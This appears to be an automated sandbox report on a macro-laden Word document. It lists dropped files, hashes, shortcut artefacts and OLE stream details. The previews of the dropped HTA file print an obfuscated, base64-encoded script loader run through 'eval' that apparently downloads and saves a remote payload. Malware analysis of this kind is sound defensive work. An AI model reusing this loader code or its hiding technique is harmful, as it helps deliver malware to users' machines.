                                                                                                                                                SHA-512:67960FEEC5EDA119383B9955DBD36550CE804EF1FD01F0E4D9AFC347068CA54BE4B89913AF2CC872E25C119318CBE3E137A4965E4A5A09231AFE960C1E2B844B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "vaci3" was not found on this server.</p>.</body></html>.
                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF56F5ACF9E8D44727.TMP
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Dec 31 19:36:12 2021, atime=Fri Dec 31 19:36:12 2021, length=8192, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):932
                                                                                                                                                Entropy (8bit):4.636058828673744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:85IBUluElPCH2B5czi2Gw/p5DDYjAX/14yCN1L9L4lC54lu4t2Y+xIBjKZm:8z5cuwROAXyv0cm47aB6m
                                                                                                                                                MD5:7755607BD4468E87311144EF33A3ED19
                                                                                                                                                SHA1:42B9047214B481183279473F40B70EC63869CDF0
                                                                                                                                                SHA-256:9524A4F258D84AE5ACD69E543E0BF113D2E2D2289CB5FDEC5E1C104671EE25BC
                                                                                                                                                SHA-512:FB17714812B4734E2F6116719C8C9405472FC95B5DEFAF0E0F04D14D584A9ED7CBD190B61D48B93A18D5D8E132D6B41A6B060CB393542D8FBF9B559760186F13
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: L..................F........N....-..3.......c........ ......................{....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...S{.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Sty..user.<.......Ny..S{......S....................lj..h.a.r.d.z.......1.....7Swy..DOCUME~1..l.......Ny..S.......Y..............B.......U.D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......G...............-.......F...........>.S......C:\Users\user\Documents........\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............y...............#.F..l.H.i.y...`.......X.......585948...........!a..%.H.VZAj...1.4...........-..!a..%.H.VZAj...1.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\enjoin,12.27.2021.doc.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 23 14:11:36 2021, mtime=Fri Dec 31 19:36:10 2021, atime=Fri Dec 31 19:36:06 2021, length=80896, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1090
                                                                                                                                                Entropy (8bit):4.6524463842136266
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8rYkmsvUluElPCH2B5cziY2Vd+W5S5sraQFOjAr/62mVaQ3DY9L4hb54hl4t2Y+C:8rJg5c2ra7ArxCaADi0hbmhX7aB6m
                                                                                                                                                MD5:848B3C4A8D5EDFE45B53EB2B19C32F02
                                                                                                                                                SHA1:341A23ADBE94181FB7A1C146985AA753ACB10447
                                                                                                                                                SHA-256:D2A414AF22C2B77087F5AD3177B1B6C13A66FA75E223108F2DFDC13A249EA555
                                                                                                                                                SHA-512:A355F001BF0DC1DD963C2B8E30D02389807B380E7EA90E8DA289D7E82752D042DD11B6C183CE007CFECD0839AD76B21EC4E06F6B7DEA56DAF0466C7719318901
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: L..................F.... ...(..M....9.........5......<...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...S{.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Sty..user.<.......Ny..S{......S....................lj..h.a.r.d.z.....~.1.....7Swy..Desktop.h.......Ny..S{......Y..............>......._.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..<...S.. .ENJOIN~1.DOC..\......7Ssy.S......h.....................''..e.n.j.o.i.n.,.1.2...2.7...2.0.2.1...d.o.c.......[...............-.......Z...........>.S......C:\Users\user\Desktop\enjoin,12.27.2021.doc..,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.n.j.o.i.n.,.1.2...2.7...2.0.2.1...d.o.c.........:..,.LB.)...As...`.......X.......585948...........!a..%.H.VZAj...1..M..........-..!a..%.H.VZAj...1..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\i7Gigabyte.hta.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 31 19:36:12 2021, mtime=Fri Dec 31 19:36:13 2021, atime=Fri Dec 31 19:36:13 2021, length=4060, window=hide
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1083
                                                                                                                                                Entropy (8bit):4.7053293992007825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8cxO5c1wZXCSimlv9uAkb0etvchbOhX7aB6m:8QCZPxlv/kb0eihbOhmB6
                                                                                                                                                MD5:AF5A4F7237CB68DE9275C7646232EAB0
                                                                                                                                                SHA1:951696FF2C22226FBD547E1B19592F43CCB40745
                                                                                                                                                SHA-256:5F7B1B882EC436DAEA81DC861E8DC7B2878A9DBCA96F257446ED21E055485C51
                                                                                                                                                SHA-512:E770A679CACBD10210E70F05742412C3FC61F094A5A5CC3610A76076FDBDCFF2FE08505D8AC3552B322040B1BCDE200AD0C292F2821CFA838229BDE13786D3F6
                                                                                                                                                Malicious:true
                                                                                                                                                Preview: L..................F.... ...c........%......%..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...S{.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Sty..user.<.......Ny..S{......S....................lj..h.a.r.d.z.......1......S....DOCUME~1..l.......Ny..S.......Y..............B.....i.v.D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....j.2......S.. .I7GIGA~1.HTA..N......S...S.......}.....................,..i.7.G.i.g.a.b.y.t.e...h.t.a.......V...............-.......U...........>.S......C:\Users\user\Documents\i7Gigabyte.hta..'.....\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.\.i.7.G.i.g.a.b.y.t.e...h.t.a.............y...............#.F..l.H.i.y...`.......X.......585948...........!a..%.H.VZAj.....M..........-..!a..%.H.VZAj.....M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):168
                                                                                                                                                Entropy (8bit):4.941026816830327
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:bDuMJlYLfzX9U3pzC5S/WCUSvngSELFXCmX1UzX9U3pzCmxWIMovTiqgSELFXCv:bCH8zASeqg3pXNzHuqg3pXs
                                                                                                                                                MD5:DFC4C8992EB0521E8CA50AB2756D6B74
                                                                                                                                                SHA1:2CD55BAE0C8A4B5BCA655EC5D11C0022A04E0259
                                                                                                                                                SHA-256:96C0D71CABDA6D1E10AB000DFA1A8C2746A3E3695728B3547EBBE9E5E4BA3A11
                                                                                                                                                SHA-512:5E93DC7CC6F1B085AB274D42B0DAE025C37C60355AD95B36214CEDC4E9C08E432B420104BEB21244DA2413C51E052B3C3811F8A2DBB9E3D3DA819705B5BE7594
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: [folders]..Templates.LNK=0..enjoin,12.27.2021.doc.LNK=0..Documents.LNK=0..i7Gigabyte.hta.LNK=0..[doc]..enjoin,12.27.2021.doc.LNK=0..[misc??????]..i7Gigabyte.hta.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):2.1911010232688923
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Rl/Zdi9//9lqKfK/lUtlqWflX/n:RtZUwEKt8
                                                                                                                                                MD5:26BC5C86C4C571FA2A0861C50746628C
                                                                                                                                                SHA1:960039851A82AEA474AF6747976E0F2DD538A533
                                                                                                                                                SHA-256:2F288BB839CD5A3965EBAFB0D796C9D0AC53D68F08BF82A72E049E36CA97C094
                                                                                                                                                SHA-512:1C7658D43B2412437B5B9F8B965609810C3598E88A84CB710EC710B43C0398936F46B6931DEAEC9C6BE078004A69E5F4FAA39333F30C963141361A610B4AD576
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .pratesh................................................p.r.a.t.e.s.h.........~oh..8..........$.......6C......zod..9..........................vo`..:..............
                                                                                                                                                C:\Users\user\Desktop\~$join,12.27.2021.doc
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):2.1911010232688923
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Rl/Zdi9//9lqKfK/lUtlqWflX/n:RtZUwEKt8
                                                                                                                                                MD5:26BC5C86C4C571FA2A0861C50746628C
                                                                                                                                                SHA1:960039851A82AEA474AF6747976E0F2DD538A533
                                                                                                                                                SHA-256:2F288BB839CD5A3965EBAFB0D796C9D0AC53D68F08BF82A72E049E36CA97C094
                                                                                                                                                SHA-512:1C7658D43B2412437B5B9F8B965609810C3598E88A84CB710EC710B43C0398936F46B6931DEAEC9C6BE078004A69E5F4FAA39333F30C963141361A610B4AD576
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .pratesh................................................p.r.a.t.e.s.h.........~oh..8..........$.......6C......zod..9..........................vo`..:..............
                                                                                                                                                C:\Users\user\Documents\i7Gigabyte.hta (copy)
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4060
                                                                                                                                                Entropy (8bit):5.772579806586633
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM
                                                                                                                                                MD5:FBDB7848F1D9945428C0101B75811195
                                                                                                                                                SHA1:FE31E65196E0844CD5858F893D44428AECE6A2B4
                                                                                                                                                SHA-256:AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A
                                                                                                                                                SHA-512:D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: <html><body><p id='processorRtx' style='font-color: #000'>eval</p><p id='rtxI7' style='font-color: #000'>fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdDspeWRvYmVzbm9wc2VyLnJlcHVTcm9zc2Vjb3JQb2VkaXYoZXRpcncueHRSb2VkaVZlbGJhdDsxID0gZXB5dC54dFJvZWRpVmVsYmF0O25lcG8ueHRSb2VkaVZlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB4dFJvZWRpVmVsYmF0IHJhdnt5cnR7KTAwMiA9PSBzdXRhdHMucmVwdVNyb3NzZWNvclBvZWRpdihmaTspKGRuZXMucmVwdVNyb3NzZWNvclBvZWRpdjspZXNsYWYgLCIwYk85ZDN6QUpOZGlBeXg5alpPeldnT3QwMT1kaXMmcUVQNTh4QURpaHNMQWFQdDhYQmpDWWNqY1h3WnZkPWVnYXAmdnQxczdwV1ZSSEdMWUpmNmdyY0QwZHl2WVg9ZWdhcCY1Nm1ldVFhQkI4Vj1lZ2FwPzNpY2F2L0YxVXJyRVgxVUFGYlJMekFBeUcvVHhlV2FiaURpOGRlR3FhdWVCTkdsRmZEV2FjQXA5TmtGNy83NzJRRkd2RklQZ3BiNlZsdHhHaHVFYnNEdHpIT3l2ZnFWYVZwNWJZODZJY3d1clMvMDgyOTQvcDB4ZGVISVZrU0kvQkZTd25lYVVmelNlS2svVEZiSWVnUWNNZjJlNWg0Yjl4SDB4RWU0aE1xalMvN29lcm9rbmx5SzkxdTllTkRBTXBTQXJhQ2JuUUxUZUpLTGFBcmpRSWhBcS82eW5zVHBaNnZCWnd
                                                                                                                                                C:\Users\user\Documents\~$Gigabyte.hta
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):162
                                                                                                                                                Entropy (8bit):2.1911010232688923
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Rl/Zdi9//9lqKfK/lUtlqWflX/n:RtZUwEKt8
                                                                                                                                                MD5:26BC5C86C4C571FA2A0861C50746628C
                                                                                                                                                SHA1:960039851A82AEA474AF6747976E0F2DD538A533
                                                                                                                                                SHA-256:2F288BB839CD5A3965EBAFB0D796C9D0AC53D68F08BF82A72E049E36CA97C094
                                                                                                                                                SHA-512:1C7658D43B2412437B5B9F8B965609810C3598E88A84CB710EC710B43C0398936F46B6931DEAEC9C6BE078004A69E5F4FAA39333F30C963141361A610B4AD576
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: .pratesh................................................p.r.a.t.e.s.h.........~oh..8..........$.......6C......zod..9..........................vo`..:..............
                                                                                                                                                C:\Users\user\Documents\~WRD0000.tmp
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4060
                                                                                                                                                Entropy (8bit):5.772579806586633
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM
                                                                                                                                                MD5:FBDB7848F1D9945428C0101B75811195
                                                                                                                                                SHA1:FE31E65196E0844CD5858F893D44428AECE6A2B4
                                                                                                                                                SHA-256:AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A
                                                                                                                                                SHA-512:D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: <html><body><p id='processorRtx' style='font-color: #000'>eval</p><p id='rtxI7' style='font-color: #000'>fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdDspeWRvYmVzbm9wc2VyLnJlcHVTcm9zc2Vjb3JQb2VkaXYoZXRpcncueHRSb2VkaVZlbGJhdDsxID0gZXB5dC54dFJvZWRpVmVsYmF0O25lcG8ueHRSb2VkaVZlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB4dFJvZWRpVmVsYmF0IHJhdnt5cnR7KTAwMiA9PSBzdXRhdHMucmVwdVNyb3NzZWNvclBvZWRpdihmaTspKGRuZXMucmVwdVNyb3NzZWNvclBvZWRpdjspZXNsYWYgLCIwYk85ZDN6QUpOZGlBeXg5alpPeldnT3QwMT1kaXMmcUVQNTh4QURpaHNMQWFQdDhYQmpDWWNqY1h3WnZkPWVnYXAmdnQxczdwV1ZSSEdMWUpmNmdyY0QwZHl2WVg9ZWdhcCY1Nm1ldVFhQkI4Vj1lZ2FwPzNpY2F2L0YxVXJyRVgxVUFGYlJMekFBeUcvVHhlV2FiaURpOGRlR3FhdWVCTkdsRmZEV2FjQXA5TmtGNy83NzJRRkd2RklQZ3BiNlZsdHhHaHVFYnNEdHpIT3l2ZnFWYVZwNWJZODZJY3d1clMvMDgyOTQvcDB4ZGVISVZrU0kvQkZTd25lYVVmelNlS2svVEZiSWVnUWNNZjJlNWg0Yjl4SDB4RWU0aE1xalMvN29lcm9rbmx5SzkxdTllTkRBTXBTQXJhQ2JuUUxUZUpLTGFBcmpRSWhBcS82eW5zVHBaNnZCWnd

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Comments: ta, Template: Normal, Last Saved By: Windows, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 27 11:02:00 2021, Last Saved Time/Date: Mon Dec 27 11:02:00 2021, Number of Pages: 1, Number of Words: 116, Number of Characters: 16118, Security: 0
                                                                                                                                                Entropy (8bit):5.843747544208076
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Word document (32009/1) 54.23%
                                                                                                                                                • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                                File name:enjoin,12.27.2021.doc
                                                                                                                                                File size:79360
                                                                                                                                                MD5:7044bd240219ec2f83b01c532e2ce5ba
                                                                                                                                                SHA1:745cdbc4a826c5960eef3f4a9aa307ff94e4b7fb
                                                                                                                                                SHA256:ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0
                                                                                                                                                SHA512:8467fc9f63711c8fa460f1f35d42b6528c6e285799d9a19630696dd3a12e24799370eaa6d53e075e60d579a3b4ecef035cf62aac6a1bc96130b392c3931882ee
                                                                                                                                                SSDEEP:768:P/MMM1tMFur3Be1l3Jeq1awypEuqjuy+uqezc1GFZIdJ6jtQlQNBOTHxPIz/tZj8:Zja8IdPhW/jTEQMiebld4Kkd6t
                                                                                                                                                File Content Preview:........................>.......................|...........................{..................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "enjoin,12.27.2021.doc"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:Microsoft Office Word
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Code Page:1251
                                                                                                                                                Title:
                                                                                                                                                Subject:
                                                                                                                                                Author:
                                                                                                                                                Keywords:
                                                                                                                                                Comments:ta
                                                                                                                                                Template:Normal
                                                                                                                                                Last Saved By:Windows
                                                                                                                                                Revion Number:2
                                                                                                                                                Total Edit Time:0
                                                                                                                                                Create Time:2021-12-27 11:02:00
                                                                                                                                                Last Saved Time:2021-12-27 11:02:00
                                                                                                                                                Number of Pages:1
                                                                                                                                                Number of Words:116
                                                                                                                                                Number of Characters:16118
                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Document Code Page:1251
                                                                                                                                                Category:explorer
                                                                                                                                                Number of Bytes:26624
                                                                                                                                                Number of Lines:65
                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                Manager:
                                                                                                                                                Company:ript.sh
                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                Shared Document:False
                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                Application Version:1048576

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: ThisDocument.cls, Stream Size: 2420
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/ThisDocument
                                                                                                                                                VBA File Name:ThisDocument.cls
                                                                                                                                                Stream Size:2420
                                                                                                                                                Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . Y . $ N . . ! . . . . . . . . . . . . N . K . N . . 5 . . . . . . . . . . . . . . . . . . . . . B 4 . + : r , L . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . B 4 . + : r , L . . . . . . x . . . . . Y . $ N . . ! . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 06 00 01 00 00 54 05 00 00 e4 00 00 00 ea 01 00 00 82 05 00 00 90 05 00 00 a0 07 00 00 04 00 00 00 01 00 00 00 40 9d 90 12 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d3 15 f5 98 59 c8 24 4e 9f 86 21 a3 de d2 ab eb 81 1c 87 c8 ad b2 15 4e 82 4b ba 4e ad 1e 35 87 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: main.bas, Stream Size: 1103
                                                                                                                                                General
                                                                                                                                                Stream Path:Macros/VBA/main
                                                                                                                                                VBA File Name:main.bas
                                                                                                                                                Stream Size:1103
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 89 03 00 00 00 00 00 00 01 00 00 00 40 9d 65 e5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                General
                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:114
                                                                                                                                                Entropy:4.42107393569
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4096
                                                                                                                                                Entropy:0.337221095365
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e x p l o r e r . . . . . . . . . . . . . . . . . . . . . . . . r i p t . s h . . . . . . h . . . . . . A . . . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 30 01 00 00 0f 00 00 00 01 00 00 00 80 00 00 00 02 00 00 00 88 00 00 00 0e 00 00 00 9c 00 00 00 0f 00 00 00 a8 00 00 00 04 00 00 00 b8 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 c8 00 00 00 11 00 00 00 d0 00 00 00 17 00 00 00 d8 00 00 00
                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4096
                                                                                                                                                Entropy:0.475702379357
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 74 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 04 01 00 00
                                                                                                                                                Stream Path: 1Table, File Type: data, Stream Size: 7224
                                                                                                                                                General
                                                                                                                                                Stream Path:1Table
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:7224
                                                                                                                                                Entropy:5.92567062364
                                                                                                                                                Base64 Encoded:True
